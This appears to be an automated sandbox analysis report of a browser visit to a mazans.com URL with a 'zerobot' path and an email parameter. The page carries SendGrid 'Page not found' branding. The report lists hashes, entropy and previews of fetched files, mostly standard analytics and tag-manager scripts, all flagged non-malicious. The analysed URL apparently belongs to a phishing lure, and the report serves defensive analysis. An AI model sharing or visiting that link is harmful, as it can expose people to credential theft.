                                                                                                                                                                                                                                                                                                                                                                          URL:https://td.doubleclick.net/td/rul/923239173?random=1731515353497&cv=11&fst=1731515353497&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4b70v875390547z89126943770za201zb9126943770&gcd=13t3t3t3t5l1&dma=0&tag_exp=101823848~101925629~102067554~102077854&u_w=1280&u_h=1024&url=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED&ref=https%3A%2F%2Fsepedatua.com%2F&hn=www.googleadservices.com&frm=0&tiba=Page%20not%20found%20%7C%20SendGrid&did=dNTIxZG&gdid=dNTIxZG&npa=0&pscdl=noapi&auid=1581689275.1731515350&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse
                                                                                                                                                                                                                                                                                                                                                                          Preview:<html></html>
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (64348)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):131451
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.429658621732427
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:/XQFiVB5BgppOi5eYwotv3waFgkNr18PpauJNYXHeY5ub1iVTJbtgWSaXKJkuq:/Nq8EfwsgYppupiVUWZ6S
                                                                                                                                                                                                                                                                                                                                                                          MD5:F0F2406D8DD884F29E9F089CEDB8D558
                                                                                                                                                                                                                                                                                                                                                                          SHA1:696AF42C78DBE51E7C436B820807D1A72ADC6D9D
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:7C3D38C58CF76805613C06F159A3619C748E191C73C56AE7C4512013C8EBCB5B
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:395D87D3F6DB3B7D3D9661546122560B78E6D9554CB3FD6E456B415B34E236A4F2A738FDE842E21067B9E14A96C9E3A1924A4D1B8F0FF375B05CA013942781D3
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview://@preserve v4.23.4+8e6839eb299da.!function(e){var t={};function r(n){if(t[n])return t[n].exports;var i=t[n]={i:n,l:!1,exports:{}};return e[n].call(i.exports,i,i.exports,r),i.l=!0,i.exports}r.m=e,r.c=t,r.d=function(e,t,n){r.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},r.r=function(e){'undefined'!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:'Module'}),Object.defineProperty(e,'__esModule',{value:!0})},r.t=function(e,t){if(1&t&&(e=r(e)),8&t)return e;if(4&t&&'object'==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(r.r(n),Object.defineProperty(n,'default',{enumerable:!0,value:e}),2&t&&'string'!=typeof e)for(var i in e)r.d(n,i,function(t){return e[t]}.bind(null,i));return n},r.n=function(e){var t=e&&e.__esModule?function t(){return e.default}:function t(){return e};return r.d(t,'a',t),t},r.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},r.p="/js/",r(r.s=15)}([function(e,t,r){"use strict";var n,i,o;Object
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (9217)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):244375
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.4541358501238815
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3072:pfLeYH8AtPJ137OeR8NteqZEbkxZNsucrl0xYurPK713EN:pfLeYc+PJxH8NNfFcrHurPK713C
                                                                                                                                                                                                                                                                                                                                                                          MD5:98A1AA6D0155EA8597C93CD050CE5808
                                                                                                                                                                                                                                                                                                                                                                          SHA1:C844C1CBAA79A4F09F50E2DF3F648B8B5AA6CB5E
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:527BF3DACC5EB62211130FE4BF315C682861320AB25B4AA2EFE6EA87A760DB8C
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:BB01621E0CBE1185D2167CEDB9517A29FE6537AE0E23254243DF90F36A66A0E1D91034E9A772E76C94FC1E1E969DB9082177777EC6085A752B3BCB9BC8B98BC2
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          URL:https://connect.facebook.net/en_US/fbevents.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 495556
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):127714
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.997748657520571
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3072:1mQ0sKTBHDS4l0qbiN731E8+6wFqxDvpHwwK:x0THD5O7OiyqjQF
                                                                                                                                                                                                                                                                                                                                                                          MD5:D7B0F8E4446C8B2519AE2DF84D5228FC
                                                                                                                                                                                                                                                                                                                                                                          SHA1:439B0BA98448EE1BDCAA9EB2C092B20352C064CB
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:90C2A4B1BE50A2241D879CA7105EB955F028584DEAE636E0333AA6327B28CD33
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:50C8FB5E99A76DE4EFDA90DDD7624B8C52D1BF22940BBB630FB12639BBC2A3645A8715CCACB6A43B5BEEAC345DAF7A5780DB7FDF2A9C2006A45FC9FEE5B13884
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          URL:https://t.contentsquare.net/uxa/8bbf67c487693.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:............^...(..<...p..(...Z.+C..fk...4#..P.......7.2.6O2........3...bJ.FfFFFDFD^...Z.xmg.Et.%E...>.G....<............+...^{9...L..._..w.z.<+..."N..<.|J.3..d..!m.6Ns.g.......<Nr6..x4...'C..;.J....,.....e..k?|.......@./.Gl/......]...=6..!.'s..x...2.R.6..RB..._ ......\Yy.z%...k{...^....q..V.J.;.].r...`[..S..\.Q.2.!.....?.eg......X>8..!LFz.K........+.......q.m.Erv^.f..^.gya....2....^..rp....f^.....,.&.....K\....Q2x..v:........l0..G...2O..X.gE.kO.1+........5 ~2..Z._...(.[B.'..7...B..".>..A>..Qlo<..vT+.....n.4K./..6..+...*.uh"...t..........~....^....%..,..d..6ya..}-...$....|@..@...Z....ki.27....|-....|W.Y......t.. a...r.I/Y.....2....YyL.$.....0...j....-;..`f`.^%.sT.U...`...8..1Hc.;.U~...q:@2.5w..q8..<.u......*9....\.5....$v.$......6..6..Jo.pa.a...."B.)...!...A.I.H....&.49...zW.k`. ......J.q>T--.._.,.....T.,+.....N..q6...a..&6..1........,.fv...6.....4w.j...)>...l.-...2.......2...J.L....x\,;....W;i>5.(\.*..E...Y.*. .p..E....`.....$.RD.>...
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4910), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):4910
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.846703685267576
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:1gWUfvlcY021mvn1blhad7OIJoodnbUp2dEjkRUXKA9tho:1DY0hf1bT47OIqWb1GKAXq
                                                                                                                                                                                                                                                                                                                                                                          MD5:4C232BE636CCE278BD608923C4D8D70A
                                                                                                                                                                                                                                                                                                                                                                          SHA1:C6CBA38F4E7769E02F3CDE50129D438A51A24484
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:BBAA8BF3AE3C41F5227393A73CA88A5D702D9AC91113E896ACE0D219785B3C16
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:286AC539D6A67C00846F6833185F6714215B483517B70DCEA905592F614E4084EB69E9A0F8094E155D5FD89B6B9B1F89341B50B10F202BFEA72B6F4AD5CA609B
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (16634)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):397333
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.64986645590308
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:Q4756FjvBa34ZtOxMBU/tLevwWY7UstNugloPvkOsWmAS:578FjvsMEeBGevdWeS
                                                                                                                                                                                                                                                                                                                                                                          MD5:A9EA069D34E9BC7B95D07F583986118B
                                                                                                                                                                                                                                                                                                                                                                          SHA1:E18EC0E9C71D3A2F619AD401166692824A4A8F3F
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:0F0A92DA2A3986D1F537037D249AA5BA0BC27993CDD500738AC6ACE07C0F0939
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:C3AEE2A6B81D294420042BF006B61514A91BFCC53F80E13CBB0BA052A339FEA76E69629CC34A54E521CCAA7A5DF6D0B4BF059455473ED5074102291ECCE6D88A
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"24",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_cross_domain","priority":22,"vtp_rules":["list","sendgrid\\.com","twilio\\.com","segment\\.com","twilio\\.org"],"tag_id":116},{"function":"__ogt_referral_exclusion","priority":12,"vtp_includeConditions":["list","sendgrid\\.com","twilio\\.com","segment\\.com","twilio\\.org","preview\\.segment\\.com","accounts\\.google\\.com"],"tag_id":118},{"function":"__ogt_ip_mark","priority":12,"v
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:PNG image data, 160 x 33, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):15993
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):2.1291425730654545
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:CS/xi843DW06r68jvsRX+4LsUd/C9ooM2f:CSJiJ3DN5usB9nlC9nM2f
                                                                                                                                                                                                                                                                                                                                                                          MD5:2AE758A77EAFD9F4AFEF5AA0DCFB5183
                                                                                                                                                                                                                                                                                                                                                                          SHA1:BAFCC8E6BA9C1142615FC7E79A7C48A191BC3071
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:04FF974D56BCE89A475826D6E123BDE2FE103D063995CCC51370D8670AD664FC
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:318790E6A9D92DDB0A9CC1AB858E687AAC7381821D6AC4F107ECE1C8CE1A8E41B0DDFFB314D4BB85333E19994294479E0A06A7A9C8FE52DBB81C53C883A20482
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.......!......A7.....pHYs.................tIME.......p.|s.. .IDATh...>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (32768)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):170630
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.2652083279763096
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3072:Kuuxfmq5UbTUHnFMiNuGUT2aAbaBH8NtC4:KuuEqcTmuGmA24
                                                                                                                                                                                                                                                                                                                                                                          MD5:AB50D7306699553DE9ED6B4CFFC87685
                                                                                                                                                                                                                                                                                                                                                                          SHA1:CB9DB6F9B7DFBFF53A2BBD177D75F03ADD3EFD62
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:E583948C2E170FF3820AE7B0894751F76D7023D524289BA64B676758A4B0D12A
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:BC7F7DD43BF827C3BF1F1278E2E66551C681F4DBFA0DE94DD909D8AE451C4D720B94489A2AF81E7B79D2C8C6986A4E686EB2795EB5DF601222A8CDDEB3B2CA0A
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:// For license information, see `https://assets.adobedtm.com/a62564f453ce/3a3a2543ac65/launch-7021ca0c1852.js`..window._satellite=window._satellite||{},window._satellite.container={buildInfo:{minified:!0,buildDate:"2024-08-21T00:40:34Z",turbineBuildDate:"2023-02-22T20:37:26Z",turbineVersion:"27.5.0"},environment:{id:"ENa13ed59d66ac47e3869ceadbb394d46a",stage:"production"},dataElements:{"6sense - Industry":{modulePath:"core/src/lib/dataElements/customCode.js",settings:{source:function(){var e=JSON.parse(_satellite.getVar("6sense - Company Details"));return e?.company?.industry}}},"6sense - NAICS":{modulePath:"core/src/lib/dataElements/customCode.js",settings:{source:function(){var e=JSON.parse(_satellite.getVar("6sense - Company Details"));return e?.company?.naics}}},"6sense - Confidence":{modulePath:"core/src/lib/dataElements/customCode.js",settings:{source:function(){var e=JSON.parse(_satellite.getVar("6sense - Company Details"));return e?.confidence}}},"6sense - Employee Range":{modu
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (701)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):558800
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.6661858145390775
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:12288:HHe/N32Dr0RnSXaKyEtG76ZKj1wa89jzQoDjU3+VLs/k5lS64cflFT3O01d:eMapiBMKZxRflF3d
                                                                                                                                                                                                                                                                                                                                                                          MD5:88A5FED5C87B1D3704AB225CFBE7A130
                                                                                                                                                                                                                                                                                                                                                                          SHA1:D64243C18FBAA356E4ABAE8414CCC4772D64060B
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:F8E5F5CE9FF44073CFF24BCD3D2B8AA4E67B67891B14FF929FE4743880FDF82E
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:8B8D1C9F4C36FD2383C96D0D484A6692F70422934BCCD3DB1F0787E1B753F7D5A8F0C91934805C4D865AED3D4673FF478F0AE23746D0C0E005E60848543B3D33
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var k=function(){return[function(n,S,D,d,Z,l,h,R,O){return(((n^53)&19)==((n&((((R=[34,2,46],n|72)==n&&(O=St(function(G,A,L){return L=(A=(G=function(f,H){return(f[(H=["replace","indexOf","trim"],H)[1]](d)!=-1&&(f=f.slice(f[H[1]](d))),f)[H[0]](/\s+/g,S)[H[0]](/\n/g,Z)[H[2]]()},G(Z+l)),G(Z+h)),A==L},D)),n)|56)==n&&(h=["https","",0],D=="*"?O="*":(d=g[R[2]](24,!0,h[1],new OI(D)),l=N[30](58,d,h[1]),Z=N[36](25,h[1],g[40](40,l,h[1]),v[21](R[1],1,S,D)),Z.D!=S||(Z.A==h[0]?E[30](90,h[R[1]],443,Z):Z.A=="http"&&.E[30](96,h[R[1]],80,Z)),O=Z.toString())),11))==n&&b.call(this,S),1)&&(O=x[42](16,C[42](44,v[R[0]](23,12),S),[u[20](3
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (23058), with escape sequences
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):23145
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.430100666317915
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:EqR0Zk8q33y4bTA8A6dEOQrhvLRvRx6ATF+G89MG64XM1A1JKwfc0/+ad:E7Zkb33yAdEXt6Em956ulKwJd
                                                                                                                                                                                                                                                                                                                                                                          MD5:98B62AEB5F2126845C5B50ABBA9AF639
                                                                                                                                                                                                                                                                                                                                                                          SHA1:241D7A81B371B10B5AF0FFA97C4FF9D9E3CCD250
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:F43C3EFC0E4CD7AD886134A73546A826F85848D9A15AB89C47A9DC40A0BBAC85
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:A436DEC81A933F115DF5874CD3B7A9D6E4EF875E748AC0729BD6E04FD3658AA9A51B7636E8783A634BD6F3009C64C64972941428CC06E1C0073B006AFEA81D9F
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:/* Copyright (c) 2008-2023, Quantcast Corp. https://www.quantcast.com/legal/license */.!function(){"use strict";var e="qcSes";function t(){var e=r();return"xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx".replace(/[xy]/g,(function(t){var n=(e+16*Math.random())%16|0;return e=Math.floor(e/16),("x"===t?n:3&n|8).toString(16)}))}var n=function(){try{if(!window.sessionStorage)return t()}catch(e){return t()}var n;try{if(n=window.sessionStorage.getItem(e))return n}catch(e){return t()}n=t();try{window.sessionStorage.setItem(e,n)}catch(e){}return n}();function r(){return(new Date).getTime()}function o(){return new Date}function a(e){var t=new Date(2e3,e,1,0,0,0,0),n=t.toUTCString(),r=new Date(n.substring(0,n.lastIndexOf(" ")-1));return t.getTime()-r.getTime()}function i(){return Math.round(2147483647*Math.random())}var c=/qcdbgc=1$/.test(window.location.toString());function u(e,t){if("undefined"!=typeof console){var n="ERROR"===e?".[41m QuantJS .[0m":".[44m QuantJS .[0m";console.log.apply(console,[n].conca
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (64348)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):131451
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.429658621732427
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:/XQFiVB5BgppOi5eYwotv3waFgkNr18PpauJNYXHeY5ub1iVTJbtgWSaXKJkuq:/Nq8EfwsgYppupiVUWZ6S
                                                                                                                                                                                                                                                                                                                                                                          MD5:F0F2406D8DD884F29E9F089CEDB8D558
                                                                                                                                                                                                                                                                                                                                                                          SHA1:696AF42C78DBE51E7C436B820807D1A72ADC6D9D
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:7C3D38C58CF76805613C06F159A3619C748E191C73C56AE7C4512013C8EBCB5B
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:395D87D3F6DB3B7D3D9661546122560B78E6D9554CB3FD6E456B415B34E236A4F2A738FDE842E21067B9E14A96C9E3A1924A4D1B8F0FF375B05CA013942781D3
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          URL:https://cdn.heapanalytics.com/js/heap-1541905715.js
                                                                                                                                                                                                                                                                                                                                                                          Preview://@preserve v4.23.4+8e6839eb299da.!function(e){var t={};function r(n){if(t[n])return t[n].exports;var i=t[n]={i:n,l:!1,exports:{}};return e[n].call(i.exports,i,i.exports,r),i.l=!0,i.exports}r.m=e,r.c=t,r.d=function(e,t,n){r.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},r.r=function(e){'undefined'!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:'Module'}),Object.defineProperty(e,'__esModule',{value:!0})},r.t=function(e,t){if(1&t&&(e=r(e)),8&t)return e;if(4&t&&'object'==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(r.r(n),Object.defineProperty(n,'default',{enumerable:!0,value:e}),2&t&&'string'!=typeof e)for(var i in e)r.d(n,i,function(t){return e[t]}.bind(null,i));return n},r.n=function(e){var t=e&&e.__esModule?function t(){return e.default}:function t(){return e};return r.d(t,'a',t),t},r.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},r.p="/js/",r(r.s=15)}([function(e,t,r){"use strict";var n,i,o;Object
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (815)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):3501
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.383873370647921
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:EI5cZUiKliCJ86U+QTEVWfeLwTauSEegdkZ5edOIC:EI5hiWNJ8kQTEVWfeUauRfdkZ5edO1
                                                                                                                                                                                                                                                                                                                                                                          MD5:147FD3B00C22BA9C939712E9213C24CA
                                                                                                                                                                                                                                                                                                                                                                          SHA1:3B48369B86FA0574F35379AACD1F42CC9C98A52B
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:70F5B11C1870CF90201A6D5F770CA318A3FA5827C74A8765EDE22B487F7D4532
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:E8419A71232EDAC8FD131446777F7D034B3171EFE07B3267479B439E4982650DB65A0D1DDC9F516315D5ED1B01ECFD2F7EB55D75D44AA51EE0AD494D441586D2
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          URL:https://www.googletagmanager.com/static/service_worker/4al0/sw_iframe.html?origin=https%3A%2F%2Fmazans.com
                                                                                                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html>.<html>.<head>. <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon">.</head>.<body>. <script>.'use strict';class m{constructor(a){this.j=a;this.g={};this.h={};this.i=0;this.id=String(Math.floor(Number.MAX_SAFE_INTEGER*Math.random()))}}function n(a){return a.performance&&a.performance.now()||Date.now()}.var p=function(a,b){class d{constructor(c,g,f){this.failureType=c;this.data=g;this.g=f;this.h=new m(n(f))}s(c,g){const f=c.clientId;if(c.type===0){c.isDead=!0;var e=this.h,h=n(this.g);e.g[f]==null&&(e.g[f]=0,e.h[f]=h,e.i++);e.g[f]++;c.stats={targetId:e.id,clientCount:e.i,totalLifeMs:Math.round(h-e.j),heartbeatCount:e.g[f],clientLifeMs:Math.round(h-e.h[f])}}c.failure={failureType:this.failureType,data:this.data};g(c)}}return new d(5,a,b)};/*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/.let q=globalThis.trustedTypes,r;function t(){let a=null;if(!q)return a;try{const b=d=>d;a=q.createPolicy("goog#html",{createHTML:b,createScript:b,crea
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (9198)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):9270
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.141086013932976
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:jJGAA61T1136GAzxXIzCzXEnMKHTo3Be+ODYTpU9WjfGgCnF8BpXzphl0sLmU:A61D3VAVXIOonMz0+OyjulaHLL
                                                                                                                                                                                                                                                                                                                                                                          MD5:00E9C65CBBA11C07C4BF4A6E2727B8EA
                                                                                                                                                                                                                                                                                                                                                                          SHA1:AC1A5D9B6FFCDE916A82169CD74C9A734BDF4A39
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:129151ED0140041B198CE3B364A11861A3B5BAA5BB60475EBF7BEDB9B0FC94D6
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:6C142FA3DE8B0452530D3E0DA7AF3B2CFCA2F0292282E07FF3AEF71426E791B650A8EDE02B5626B7ECF177B45B86630DACDDE9F9480B639E01C7B9D994535D2B
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          URL:https://cdn.segment.com/analytics-next/bundles/ajs-destination.bundle.ed53a26b6edc80c65d73.js
